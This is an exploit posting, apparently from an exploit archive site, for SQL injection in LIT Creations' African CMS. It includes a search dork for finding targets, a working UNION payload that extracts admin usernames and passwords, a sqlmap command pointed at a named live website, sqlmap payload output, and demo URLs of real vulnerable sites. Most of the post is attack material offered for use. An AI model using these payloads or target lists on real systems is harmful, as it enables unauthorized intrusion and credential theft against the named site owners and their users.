LIT Creations African CMS SQL injection

2019.06.10
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-# # Exploit Title: LIT Creations African CMS SQL injection # Date: 2019-06-10 # Dork : intext:"Website designed and hosted by LIT Creations" inurl:id= # Exploit Author: S I R M A X # Vendor Homepage: https://www.litcreations.com/ # Version: All Version # Tested on: win,linux ================================================================================= [SQL injection] [+] Method ( Sql injection ) H_A_Security Security Team of IRan [+] parameter : ID == php?ID= ================================================================================= Mode Hash : MD5 ================= -----== Way 1(No machine use) ==----- [#] Testing Method: [+] - UNION query -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Exploits ==> [*] id=-847' UNION SELECT 1,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(table(admin))WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x75736572,0x203d3d3e20,usern,0x3c62723e,0x70617373,0x203d3d3e20,pswrd,0x3c62723e,0x3c62723e))))x),3,4,5,6,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(table(admin))WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x75736572,0x203d3d3e20,usern,0x3c62723e,0x70617373,0x203d3d3e20,pswrd,0x3c62723e,0x3c62723e))))x),[Number of columns]-- - <-> #At all sites, Column 2 or 7 is 100% vulnerable <-> #Note that you should find the name of the admin table and put it in the exploit -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ ================================================================================================================================= -----== Way 2(using the machine) ==----- [+] Sqlmap: [-] sqlmap.py -u https://gohealthy.co.za/product.php?id=1 --dbs [#] Testing Method: [+] - boolean-based blind [+] - time-based blind [+] - UNION query -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ ||||||||||||||||||||||| Parameter: id (GET) || ||||||||||||||||||||||| Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=847' AND 5651=5651 AND 'gEnD'='gEnD -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=847' AND SLEEP(5) AND 'spZF'='spZF -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Type: UNION query Title: Generic UNION query (NULL) - 23 columns Payload: id=-9178' UNION ALL SELECT NULL,CONCAT(0x716a717871,0x466f4b58426e547a66684763786150476779496f4b556548427069736d70664d414f5771615a6a50,0x716b7a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- qUjC -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ ================================================================================= Demo: [+] https://www.thelearningpoint.co.za/events.php?id=[SQL] [+] https://gohealthy.co.za/product.php?id=[SQL] ================================================================================= [=] T.me/Sir_Max [=] Telegram Channel ==> @H_A_SeCuRiTy #-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#


Vote for this issue:
80%
20%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top